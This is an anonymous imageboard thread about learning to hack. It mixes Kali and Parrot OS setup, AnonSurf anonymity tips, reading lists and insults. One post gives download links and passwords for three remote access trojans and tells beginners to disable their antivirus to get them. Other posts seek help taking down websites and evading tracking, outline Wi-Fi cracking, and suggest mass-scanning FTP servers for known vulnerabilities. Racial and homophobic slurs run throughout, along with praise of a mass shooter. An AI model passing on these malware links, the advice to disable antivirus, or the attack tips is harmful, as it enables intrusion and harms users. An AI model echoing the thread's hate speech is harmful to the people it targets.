*bows head i shame…

*exits

Ok guys. I’m finally able to use my knowledges for the good of this world. Thanks to everyone who have participated and please make this thread live long. Share it also!

All the beautifully creative minds in this thread and yet somehow this site is still up and running.

I am disappoint.

bump

Was just scoopin.

What do people ITT think of Qubes OS?

>>33249

Substantiate your claims and present an alternative then.

>>33249

Like nobody would signal it if it was backdoored?

And anyway we can still make the risky stuff with Tails

>>33249

>utility distro like kali

>live CD booted for a single campaign

>matters if it is backdoored

Watch out guys we have a 1337 haxx0r here.

>>35055

>Like nobody would signal it if it was backdoored?

This is a fairly shit excuse. /tech/ has plenty of fags that act like something being open-source means that it has already been audited. Of course, nobody has any actually looked at the source or any example of someone having audited it. Only that it being theoretically possible means it has already been done and that the audit they is no evidence of agrees with it being clean.

>>21074

What websites, pdfs, books should i look on and read be able to have the knowledge to take down a website, it would mean a lot if you could help me out, thanks, i need to start off from somewhere because i don't know from where to start

>>21074

Also do i just use a simple vpn like windscribe to not get tracked?

>>35620

That's true, but free software is miles better to examine than proprietary software. You can still audit parts of code, fuzz, automated auditing, it won't be a "full audit" but finding backdoors made by unskilled programmers is pretty easy even without a full audit.

>>13983

>actively performing OSINT to bring a dirty murderer to justice

Did he not get his temple recommend or renew his lodge fees?

Gangs talking, it's real. Of course we hated to have to use COLLOSSUS on you faggots AGAIN but…

>>14859

new vm passwords for kali are:

user: kali

password: kali

then to get root permissions:

[CTRL]+[ALT]+T ←—-this key combination brings up the terminal

kali@kali:~
$ sudo passwd root
New password: (type in a new password, lets use xyz )
Retype new password: (type in the same new password, xyz )
passwd: password updated successfully
kali@kali:~
$ _

this will not change your "kali" login and password

there are two logins and passwords that you need.

to make anonsurf work, you must have root access.

so, to view a list of commands for anonsurf, you type in:

< anonsurf

then this will show up"

$ anonsurf

Parrot AnonSurf Module
	Usage:
	┌──[user@mx]─[/home/user/Desktop]
	└──╼ $ anonsurf {start|stop|restart|change|status}
	
	 start - Start system-wide anonymous
		  tunneling under TOR proxy through iptables	  
	 stop - Reset original iptables settings
		  and return to clear navigation
	 restart - Combines "stop" and "start" options
	 change - Changes identity restarting TOR
	 status - Check if AnonSurf is working properly
	 myip - Show your current IP address
	----[ I2P related features ]----
	 starti2p - Start i2p services
	 stopi2p - Stop i2p services

so, to start anonsurf, you type in

< sudo anonsurf start

(it may ask for that password that you make up earlier! - remember? xyz )

To check anonsurf's status, you simply type in:

< anonsurf status

and to stop anonsurf, you type in

< sudo anonsurf stop

I personally recommend that users try to stay away from logging in as superuser, as there are more opportunities to fuck up a computer.

I run linux, and can use anon surf with my distro.

its not much of a big deal, it helps to protect your online anonymity.

I'm grateful that OP is showing folks how to use this great resource.

I don't have a hell of a lot of patience.

>>33249

It truly does seem like GAN puke at some points doesn't it.

>>21267

>>21266

>>21319

>>13983

>>13997

>VM

Why would you use VMware rather than the open source VirtualBox?

http://techgenix.com/virtualbox-vmware-compared/

I upload. We need more visibility or new tutorials

thanks chief I'm gonna go through this now and try it out

>>14031

[ERROR] Could not change MAC: interface up or insufficient permissions: Operation not permitted

:(

Okay here are my 2 cents.

If you want to get better at hacking and not just use premade metasploit then go and masscan all the FTP services in one particular area (let's say your country, or your ISP based on the ASNs ip range).

Then after scanning you take the version and name of software and you run a big data analysis to see what is the most common software used and in what version (Shodan helps but I don't give money to kikes, so you can use them to get a guesstimation).

After that you look up CVEs for that software. You look up if there is metasploit module for that. No? Make your own. There is no vulnerability? Find it by putting it in virtual machine and throwing fuzzers and whatnot at it. If you have the source code there are plenty of static code analysis tools out there. Search up every term you don't understand and learn everything that will get you closer to your goal.

Can this thread not die yet? I’ve liked it a lot.

Please someone post more!

What is the bare minimum setup for solid anonimity?

Are AnonSurf + macchanger enough?

ParrotOS btw

>>13983

is this just gonna brick my computer or smth?

Bump for informative thread

>>13983

What program or OS do i need to take advantage of tiktoks monitoring system? I want to see how much access tiktok has to people's accounts, how do i do this?

>>97960

Combination of a network sniffer (wireshark, tcpdump) and an intercepting proxy (zed attack proxy, Burp Suite)

Also, check em

>>13983

>how to upload a Kali Linux disk image to the Virtual Machine

nigga… just stop

>>13983

For the laymen in the thread looking to learn 'how to hack':

OP is a faggot. Not even a script kiddie. Just a faggot.

Read K&R C, then report back. I will make a thread in a week.

>>122202

Done.

>>122202

It has been a week, I kinda learned C, please teach me.

>>122202

i am somewhat familiar with C. we are waiting for you.

>>13983

If you're going to entrapmentpost at least be original about it.

>>13983

>Bash Hacker's Wiki

https://wiki-dev.bash-hackers.org/

>The Scheme Programming Language

https://www.scheme.com/tspl4/

>Tmux & Neovim

https://lucasfcosta.com/2019/02/10/terminal-guide-2019.html

>>127627

Yes?

What the fuck does that matter, it's used in most all unixlikes.

If you can't understand it, you're fucked.

Zsh is the better shell, obv. You should learn and use that, too.

>>127627

Bash is one of the languages which I most enjoy writing code in. It's just fun.

>>127628

You've clearly never written many bash scripts. From a language design perspective, it's absolutely disgusting. Bash is actually even worse than PHP and Javascript, which is unbelievable. Also you can ignore Zsh and just use Fish instead.

>>127637

Bash is shit mate. What do you expect from a nigger jew? If you want something fun, look at Tcl, Scheme, LISP, Erlang, and if you like strong type systems, Haskell.

>>127628

> it's used in most all unixlikes.

And it shouldn't be! Since the extensions are not POSIX compliant.

>>127648

Sorry if I misinterpreted the OP, which did ask for hacking materials.

Implement our own stuff with zsh (or fish in your case) and crack dumb assholes who use bash (think shellshock).

I did mention Scheme.

>>127666

Hi Satan, allow me to confess. My only intent was to to post Brian for shock value, because many people, especially on /pnd/ aren't going to know Bash was created by a nog (even though he's obviously high functioning). Everything else was serious though, and bash is shit, because it was more of a band-aide to fix bourne shell.

>>127666

As for OP, he's just a script kiddie that wanted to feel like a teacher. You know the type that learn something, and then immediately create a youtube video to share their hot tip? That's op.

>>14125

ParrotOS generally breaks once you call upgrade even when it's NOT in a virtual box.

I have multiple RATs. Warzone, Pentagon, and njRAT. If you're new to hacking, please make sure to disable your AV and download them using Firefox as these usually pop up as Trojans even though they create Trojans. Chrome and your AV will block them. Have Fun!

Warzone RAT: https://anonfiles.com/F3J9I4E1od/Warzone_Rat_zip

Password: 123

Pentagon RAT: https://anonfiles.com/B4JcIbEaod/Pentagon_RAT_zip

Password: 123

njRAT: https://anonfiles.com/39J2I4E2o1/njRAT_v0.11_zip

Password: 123

>>127648

>Bash is actually even worse than Javascript

And now I can ignore everything you say. The only thing worse than javascript is java.

>>130820

>openbsd rules

>picture of the freebsd devil stabbing tux

>>137165

>The only thing worse than javascript is java.

Java is an actual useful language. JavaScript is broken beyond repair.

>>130764

What is that she is eating? It looks incredibly unhealthy, but I want to know.

>>137178

King's Hawaiian Bread French Toast with a blueberry compote and homemade stiff whipped cream topped with maple syrup.

Total sugar coma.

>>137185

I don't think I could eat that without wanting to die, but thanks for the info.

>>13983

oy vey mr. glowstein i bet my ass you don't even know how to use aircrack

>>140161

Not op but on backtracker it's uh

Sudo -airodump

aireplay

than brute force with an aircrack using some dictionary

But that's really dumbo stuff. I used to do that when I was 15 and couldn't afford internet

OP you inspired me. I am an oldfag that grew up better than most with computers but never got to the point of using it in more "creative" ways. I'm not just blindly following the instructions but taking it slow and exploring lots of what I've forgotten or never knew.

Lets see what happens.

Peace and HH borther.

>>14125

E: Could not open lock file /var/lib/dpkg/lock-frontend - open (13: Permission denied)

E: Unable to acquire the dpkg frontend lock (/var/lib/dpkg/lock-frontend), are you root?

>>33256

Yes. First response that did not make my stomach cringe. Gentoo or GTFO… orPentoo https://pentoo.ch/docs

Fucking ParrotSec? You are an embarrassment. Sad. Pre package, pre made tools, no coding experience, you should spend ten more years lurking and not running ZAP and nikto like your 1337 zoomer faggot nigger

i miss 2600

>>13997

I am going to attempt to avoid sarcasm and irony.

Never trust that Kali OVA to anything worthwhile on, or at all.

Do not use fucking VMWARE for the love of Saint Tarrant. VirtualBox at least.

>>15448

No to ParrotSec

>>15353

Anonsurf consistently leaks packets. build the gruqs PORTAL or get an anonabox and tunnel all your traffic over physical infrastructure to TOR.

>>16359

You disgust me

>>14534

You are glowing brighter than that yellow ribbon you got during your Security+ class in Quantico. Just stop.

>>14537

reeeeeeeeeeeee

>>14117

kek

>>14257

do not use these for the love of Saint Tarrant. Use whatever brain is still left over from the massive amounts of Fentanyl you have injected. Stop.

>>15530

at least a starting point i wont laugh at you for

>>45951

this thread is giving me aids

>>33256

this entire thread should be just this post. install gentoo. i weep for the future

>>130820

BSD is also good

>>157739

this thread was the least inspiring pile of shit ive read in 48 hours.

>>14009

kek

>>157840

Hey faggot, make your 1337 hacker guide OP now

>>159309

>spoonfeeding retards.

Anon that's how you create script kiddies. "l337" hacking is a process of learning by doing. You must invest time to understand how things actually work, and experiment. That said, the following gem is quite elucidating and should jump start the path to discovery. I recommend it for any serious budding "hacker." Every competent systems programmer should read it to, to understand how innocuous mistakes can turn into exploits.

https://insecure.org/stf/smashstack.html

>>14885

run this first:

sudo apt-get update

Reason: Your package manager probably has an out-of-date listing of the available packages (which would include anonsurf), so update the listing first, then try to install it.

If you really want to get into cybersecurity (I'd highly recommend it, there are barely any of us out there), start with:

HackTheBox

https://hackthebox.eu

IppSec: https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA

Watch the videos and play along in the lab. Don't feel bad for using the videos as a crux

I'm new to networking or what ever you call it. I have some experience with programming on android studios and unity but nothing advanced, just an intermediate level.

Anyway I downloaded and installed this program that can find bugs on websites.

I have found some bugs on the website i was running the program on. Now how do I create an exploit? I heard exploits are the things you use to take advantage of the bugs you find in websites. How do I find or built an exploit and use it without getting in trouble and tracked?

>>14042

KDE neon is best general purpose loonix distro. Change my mind.

>>194974

Reported for mass spam and board sliding.

>>60244

try with sudo before the command

>>169969

but how long will it take for the indians who wont be asking for $100k and above salaries to take over this industry too?

Bump. Am going to do this in my day off

>>201216

NVM, I followed this guide and it works now.

https://docs.microsoft.com/en-us/troubleshoot/windows-client/application-management/virtualization-apps-not-work-with-hyper-v

Bump

Three rules to go by:

1. Learn to Archive and data-mine. Gallery-DL (images), Youtube-DL(video/audio), FanFicFare/Fiction-DL (blogs), WGet/Curl…

2. Learn to use encryption like PGP or if you are a pleb, Pretty Easy Privacy

3. Get on Matrix, and host your own wikis, boorus, imageboards or websites

4. Use Linux (if you can't handle Arch at least use Mint), and use compression software to do encryption

5. Prep the browser to handle ads and trackers, get social media re-routers (Invidio, Nitter, Teddit, Bibliogram etc.)

6. Be ready to upload based books to LibGen, and get documents from Sci-Hub

7. Auto-archive tools for archive.md and archive.org should be used in case idiots don't want to open your web scraped files

8. For the love of fuck don't hammer TOR/I2P and DoSS as "leet haxxor" cus that is fed-tier

>>13983

you're talking about a skill set that takes decades to get any good at. There's a reason those tech guys can command a high salary without any licensing to limit entry to the field. Don't get hopeful about learning to hack anything soon.

Although yes if you are any kind of political dissident you should not be using any operating system written by microsoft or google, apple's iffy but still wouldn't.